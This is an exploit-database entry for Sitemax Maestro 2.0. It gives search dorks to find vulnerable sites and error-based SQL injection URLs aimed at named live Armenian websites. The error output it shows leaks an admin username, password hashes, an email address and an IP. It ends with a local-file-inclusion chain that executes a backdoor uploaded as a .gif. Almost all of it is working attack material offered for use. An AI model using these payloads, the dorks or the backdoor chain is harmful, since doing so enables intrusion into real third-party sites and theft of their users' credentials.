Sitemax Maestro 2.0 SQL Injection / Local File Inclusion Vulnerability

2012-09-04T00:00:00
ID 1337DAY-ID-19323
Type zdt
Reporter AkaStep
Modified 2012-09-04T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ========================================
Vulnerable Software: Sitemax Maestro v. 2.0 (from http://sitemax.am/)
Sitemax Maestro v. 2.0
Vendor: http://sitemax.am/
License Type: Commercial
Discovered and Exploited in Wild
=========================================
Dork 1:
site:am pages.php?al=

Dork 2:
site:am swlang.php

Dork: 3

Designed and developed by SiteMax IT
Sitemax Maestro v. 2.0

=========================================


Error based Blind SQLi:


http://megasport.am/pages.php?al=100000000000000000000000000' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1

http://megasport.am/maestro/ <== Admin Panel


Megasport
2012-09-03 05:51
Fatal error : SQL error : Duplicate entry 'admin|1a90712bbe24c5142e13fe9d7a98e6031' for key 1
SELECT * FROM sed_zpages WHERE alias='100000000000000000000000000' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1' and _level_ >= 1




If the MYSQL v >5.1 you can use this way also:(Funny pow() failure ;))

http://site.tld/pages.php?al=100000000000000000000000000' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1


Demo 2 and New technique:


http://armenbrok.am/pages.php?al=contacts1' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1


2012-09-02 19:59
Fatal error : SQL error : DOUBLE value is out of range in 'pow((hex((select concat_ws('admin','e6053eb8d35e02ae40beeeacef203c1a','[email protected]','130.193.121.51') from dual limit 1))),(rand() * 1e100))'
SELECT * FROM sed_zpages WHERE alias='contacts1' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1' AND visible='1' LIMIT 1



Local File Inclusion:

After gain access  to admin panel: Upload your backdoor as backdoor.gif file using site.am/pfs.php

Then include it: site.am/swlang.php?lang=../../datas/users/3-fuck.gif%00&redirect=L2FkbWluLnBocA==



Enjoy with your backdoor on server)


/AkaStep & BOT_25 & HERO_AZE



#  0day.today [2018-01-04]  #